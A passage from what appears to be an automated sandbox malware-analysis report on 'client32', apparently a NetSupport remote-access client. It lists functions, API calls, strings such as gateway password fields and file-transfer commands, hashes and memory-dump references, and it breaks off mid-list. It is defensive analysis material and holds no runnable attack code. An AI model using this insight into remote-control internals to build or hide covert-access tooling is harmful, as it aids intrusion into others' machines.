                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Library$Handle$ErrorFreeLastProcess$CloseLoadModuleOpenToken$FileImageInformationNameVersion_memset_strrchr
                                                                                                                                                    • String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
                                                                                                                                                    • API String ID: 348974188-2591373181
                                                                                                                                                    • Opcode ID: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
                                                                                                                                                    • Instruction ID: c6fb8941b728de1d874c8cf5bae9c94d2d097e9c1a5b8d4b24900e8511d45065
                                                                                                                                                    • Opcode Fuzzy Hash: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
                                                                                                                                                    • Instruction Fuzzy Hash: A2C17DB1D0066A9FDB22DF658D846ADFAB8BB09314F4141FAE65CE7280D7309B84CF51
                                                                                                                                                    Function 6CA8EEA0 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 182sleepsynchronizationthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetEvent.KERNEL32(00000314), ref: 6CA8EEC7
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000318,00001388), ref: 6CA8EED5
                                                                                                                                                    • TerminateThread.KERNEL32(00000318,000000FF), ref: 6CA8EEF5
                                                                                                                                                    • CloseHandle.KERNEL32(00000318), ref: 6CA8EF07
                                                                                                                                                    • SetEvent.KERNEL32(00000320), ref: 6CA8EF16
                                                                                                                                                    • ctl_hangup.HTCTL32(00000001), ref: 6CA8EF26
                                                                                                                                                    • Sleep.KERNEL32(00000014), ref: 6CA8EFB8
                                                                                                                                                    • CloseHandle.KERNEL32(00000314), ref: 6CA8EFCE
                                                                                                                                                    • CloseHandle.KERNEL32(0000031C), ref: 6CA8EFD6
                                                                                                                                                    • CloseHandle.KERNEL32(00000320), ref: 6CA8EFDF
                                                                                                                                                    • WSACleanup.WSOCK32 ref: 6CA8EFE9
                                                                                                                                                    • CloseHandle.KERNEL32(0000030C), ref: 6CA8EFFB
                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00000002), ref: 6CA8F01F
                                                                                                                                                    • DeleteCriticalSection.KERNEL32(6CACB898), ref: 6CA8F03A
                                                                                                                                                    • _free.LIBCMT ref: 6CA8F043
                                                                                                                                                      • Part of subcall function 6CAA1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6CAA1C13
                                                                                                                                                      • Part of subcall function 6CAA1BFD: GetLastError.KERNEL32(00000000), ref: 6CAA1C25
                                                                                                                                                    • _free.LIBCMT ref: 6CA8F04F
                                                                                                                                                    • _free.LIBCMT ref: 6CA8F07B
                                                                                                                                                    • _free.LIBCMT ref: 6CA8F08D
                                                                                                                                                    • _memset.LIBCMT ref: 6CA8F0A1
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 6CA8F0BB
                                                                                                                                                    • timeEndPeriod.WINMM(00000001), ref: 6CA8F0D6
                                                                                                                                                      • Part of subcall function 6CA84610: DeleteCriticalSection.KERNEL32(-00000008,?), ref: 6CA84698
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle$_free$CriticalDeleteSection$EventFree$CleanupErrorHeapLastLibraryObjectPeriodSingleSleepTerminateThreadWait_memsetctl_hanguptime
                                                                                                                                                    • String ID: CMD=CLOSE$Error. Terminating httprecv Thread
                                                                                                                                                    • API String ID: 2861375113-448471891
                                                                                                                                                    • Opcode ID: 637fa35fac34575dd038f232f9804863253a91d2af1efe7262cc881950f35a3b
                                                                                                                                                    • Instruction ID: 4948849df337a0648aca4dff82b222c7e33c76cd2a0325973506554bae350151
                                                                                                                                                    • Opcode Fuzzy Hash: 637fa35fac34575dd038f232f9804863253a91d2af1efe7262cc881950f35a3b
                                                                                                                                                    • Instruction Fuzzy Hash: C1518DB1B0130BAFDF04DFB8DD84D9B73B8AB45308B148529E515D7A40DB31DA8ACBA1
                                                                                                                                                    Function 6CA82CE0 Relevance: 38.6, APIs: 11, Strings: 11, Instructions: 58libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6CA82A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6CA82ACB
                                                                                                                                                      • Part of subcall function 6CA82A90: _strrchr.LIBCMT ref: 6CA82ADA
                                                                                                                                                      • Part of subcall function 6CA82A90: _strrchr.LIBCMT ref: 6CA82AEA
                                                                                                                                                      • Part of subcall function 6CA82A90: wsprintfA.USER32 ref: 6CA82B05
                                                                                                                                                    • GetModuleHandleA.KERNEL32(NSMTRACE,6CA82AB1), ref: 6CA82CFA
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 6CA82D15
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 6CA82D22
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 6CA82D2F
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 6CA82D3C
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 6CA82D49
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 6CA82D56
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 6CA82D63
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 6CA82D70
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 6CA82D7D
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 6CA82D8A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Module_strrchr$FileHandleNamewsprintf
                                                                                                                                                    • String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
                                                                                                                                                    • API String ID: 3896832720-3703587661
                                                                                                                                                    • Opcode ID: bd58ea94d43a4ae9db1f4234eb55409498ac431ab24dbfaf52b9cff4f931bfe5
                                                                                                                                                    • Instruction ID: 11b9e0a432b42503a4ef35657d4b7aeb04d619024e266585439653afbaef0dee
                                                                                                                                                    • Opcode Fuzzy Hash: bd58ea94d43a4ae9db1f4234eb55409498ac431ab24dbfaf52b9cff4f931bfe5
                                                                                                                                                    • Instruction Fuzzy Hash: 4E0190B5F523DD6ECF58AB7A9C09D873AF8BB96311B028917F004D2600E6744586CFE2
                                                                                                                                                    Function 1105D240 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 124filewindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenFileMappingA.KERNEL32(000F001F,00000000,-00000007), ref: 1105D277
                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1105D294
                                                                                                                                                    • GetDC.USER32(00000000), ref: 1105D2BB
                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 1105D2CF
                                                                                                                                                    • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 1105D2F2
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1105D300
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1105D30F
                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1105D333
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1105D33C
                                                                                                                                                    • GetLastError.KERNEL32(?), ref: 1105D348
                                                                                                                                                    • GdiFlush.GDI32 ref: 1105D35C
                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1105D367
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 1105D36E
                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 1105D378
                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 1105D384
                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 1105D38E
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1105D396
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileObject$CountCreateDeleteSelectTickView$CloseCompatibleErrorFlushHandleLastMappingOpenReleaseSectionUnmap
                                                                                                                                                    • String ID: /thumb:$Error %d blitting from winlogon, took %d ms$ThumbWL
                                                                                                                                                    • API String ID: 652520247-4094952007
                                                                                                                                                    • Opcode ID: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                                                                                                    • Instruction ID: 78b6d8997dae8530c3cf648a665dcf4201cc58d59c57f0d4bee68b800920de56
                                                                                                                                                    • Opcode Fuzzy Hash: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                                                                                                    • Instruction Fuzzy Hash: 924190B9E41229AFD704CFA4DD89FAEBBB8FB48704F104165F920A7644D730A901CBA1
                                                                                                                                                    Function 1102B4C0 Relevance: 33.5, APIs: 4, Strings: 15, Instructions: 291timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                                                                                      • Part of subcall function 110CFE80: _malloc.LIBCMT ref: 110CFE9A
                                                                                                                                                      • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
                                                                                                                                                    • wsprintfA.USER32 ref: 1102B84D
                                                                                                                                                      • Part of subcall function 110ED8F0: RegQueryInfoKeyA.ADVAPI32(0002001F,?,?,0002001F,?,?,0002001F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,1102B625), ref: 110ED926
                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(0002001F,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 1102B65A
                                                                                                                                                    • wsprintfA.USER32 ref: 1102B69E
                                                                                                                                                    • wsprintfA.USER32 ref: 1102B705
                                                                                                                                                      • Part of subcall function 110EDF70: wsprintfA.USER32 ref: 110EDFD4
                                                                                                                                                      • Part of subcall function 110EDF70: _malloc.LIBCMT ref: 110EE053
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wsprintf$Time_malloc$EnumFileInfoOpenQuerySystem
                                                                                                                                                    • String ID: %02d/%02d/%02d %02d:%02d:%02d.%03d$%s\%s$Accel=restored$Acceleration$DirectSound$DirectSound\Device Presence$DirectSound\Mixer Defaults$Error. Can't open %s$IsA()$Software\NSL\Saved\DS$WDM$Warning. DSReg e=%d, e2=%d$accel=%d, wdm=%d, key=%s, mix=%s, dev=%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$set %s=15, e=%d
                                                                                                                                                    • API String ID: 2153351953-120756110
                                                                                                                                                    • Opcode ID: 55af8f51facff4bcc049042925dfacc4f9a74063fc1775215d98820dbec6b2aa
                                                                                                                                                    • Instruction ID: 3d8c04e41a601bc5ed25e478ecb801087f545ab88011abf8f54d42b1378c6c4c
                                                                                                                                                    • Opcode Fuzzy Hash: 55af8f51facff4bcc049042925dfacc4f9a74063fc1775215d98820dbec6b2aa
                                                                                                                                                    • Instruction Fuzzy Hash: CEB17075D0122AAFDB24DB55CD98FEDB7B8EF05308F4041D9E91962280EB346E88CF61
                                                                                                                                                    Function 6CA94CF0 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 196COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 6CA94D1C
                                                                                                                                                    • _free.LIBCMT ref: 6CA94E16
                                                                                                                                                    • _free.LIBCMT ref: 6CA94E5D
                                                                                                                                                    • _free.LIBCMT ref: 6CA94E8B
                                                                                                                                                    • _free.LIBCMT ref: 6CA94EB9
                                                                                                                                                      • Part of subcall function 6CA97B60: _sprintf.LIBCMT ref: 6CA97B77
                                                                                                                                                      • Part of subcall function 6CA977E0: _free.LIBCMT ref: 6CA977EF
                                                                                                                                                    • _free.LIBCMT ref: 6CA94EF6
                                                                                                                                                      • Part of subcall function 6CA863C0: EnterCriticalSection.KERNEL32(6CACB898,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA863E8
                                                                                                                                                      • Part of subcall function 6CA863C0: InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6CA863FA
                                                                                                                                                      • Part of subcall function 6CA863C0: EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6CA8D77B,00000000), ref: 6CA86412
                                                                                                                                                      • Part of subcall function 6CA863C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6CA8643B
                                                                                                                                                      • Part of subcall function 6CA863C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6CA8646F
                                                                                                                                                      • Part of subcall function 6CA863C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6CA864A3
                                                                                                                                                      • Part of subcall function 6CA863C0: _memset.LIBCMT ref: 6CA865C8
                                                                                                                                                      • Part of subcall function 6CA863C0: LeaveCriticalSection.KERNEL32(?,?,6CA8D77B,00000000), ref: 6CA865D7
                                                                                                                                                      • Part of subcall function 6CA863C0: LeaveCriticalSection.KERNEL32(6CACB898,?,00000000,?,6CA8D77B,00000000), ref: 6CA865F2
                                                                                                                                                    • _free.LIBCMT ref: 6CA94EED
                                                                                                                                                      • Part of subcall function 6CAA1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6CAA1C13
                                                                                                                                                      • Part of subcall function 6CAA1BFD: GetLastError.KERNEL32(00000000), ref: 6CAA1C25
                                                                                                                                                    • _free.LIBCMT ref: 6CA94F09
                                                                                                                                                    • SetLastError.KERNEL32(?), ref: 6CA94F12
                                                                                                                                                      • Part of subcall function 6CA88C30: _memset.LIBCMT ref: 6CA88C5B
                                                                                                                                                      • Part of subcall function 6CA88C30: _free.LIBCMT ref: 6CA88CCC
                                                                                                                                                      • Part of subcall function 6CA88B50: _memset.LIBCMT ref: 6CA88B68
                                                                                                                                                      • Part of subcall function 6CA88B50: wsprintfA.USER32 ref: 6CA88B87
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$CriticalSection_memset$AddressProc$EnterErrorLastLeave$DecrementFreeHeapInterlocked_sprintfwsprintf
                                                                                                                                                    • String ID: CMD=PUTFILELINK$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$LINK=%s$ON=%s$PWD=%s$SUB=%s
                                                                                                                                                    • API String ID: 2025600352-1925890548
                                                                                                                                                    • Opcode ID: ce11a477061351c0179f90513373d507a6117b71c10de2fdf6da91f5923ffde4
                                                                                                                                                    • Instruction ID: 59a8d1ca52ffdc7c3da1761d70d666940a7e612904eb5b2254625fd416b3b95c
                                                                                                                                                    • Opcode Fuzzy Hash: ce11a477061351c0179f90513373d507a6117b71c10de2fdf6da91f5923ffde4
                                                                                                                                                    • Instruction Fuzzy Hash: 32619EB2D00208ABDB11DFE4CD45FEEBBB8AF44308F144519E515AB745EB31A58DCBA1
                                                                                                                                                    Function 1113B660 Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 308COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SystemParametersInfoA.USER32(00000010,00000000,111F1A18,00000000), ref: 1113B6F2
                                                                                                                                                    • SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 1113B705
                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000010,00000000,00000000,00000000), ref: 1113B89D
                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1113B8B3
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1113B8FB
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 1113BA43
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoParametersSystem$CloseDirectoryFolderHandlePathWindows__wcstoi64
                                                                                                                                                    • String ID: Client$PrefixName$RecordAudio$ReplayFiles$ReplayPath$Show$ShowRecord$ShowToWindow$UI: End Show$UI: Start Show$\Desktop
                                                                                                                                                    • API String ID: 3054845645-718119679
                                                                                                                                                    • Opcode ID: 6efe753ee26842de22518b522e7ef95a7534501bb52dc1f92809c48ca1fd7538
                                                                                                                                                    • Instruction ID: 97c658d0ff47ffb6e0b086364488060456d2f78afd94873c83fd0d8ea8d00dc5
                                                                                                                                                    • Opcode Fuzzy Hash: 6efe753ee26842de22518b522e7ef95a7534501bb52dc1f92809c48ca1fd7538
                                                                                                                                                    • Instruction Fuzzy Hash: 9DB15A74B41625AFE316DBA0CD91FE9FB61FB84B19F004129FA15AB2C8E770B840C795
                                                                                                                                                    Function 110EB540 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 141windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • wsprintfA.USER32 ref: 110EB5D8
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 110EB632
                                                                                                                                                    • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB646
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 110EB64E
                                                                                                                                                    • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB696
                                                                                                                                                    • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000000), ref: 110EB6C8
                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,00000000), ref: 110EB6D5
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 110EB6DC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
